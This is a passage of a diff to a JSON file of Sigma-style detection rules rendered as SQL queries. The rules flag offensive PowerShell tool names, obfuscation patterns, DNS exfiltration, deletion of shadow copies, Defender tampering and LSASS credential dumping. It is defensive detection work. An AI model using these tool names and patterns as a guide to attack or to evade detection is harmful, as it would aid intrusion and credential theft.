'%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_mssql_sp_procoption_set.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", - "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other MSI packages for which your admins have used that name" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", - "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", - "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", "attack.impact", - "attack.t1499.004" + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", + "status": "experimental", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "status": "test", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE 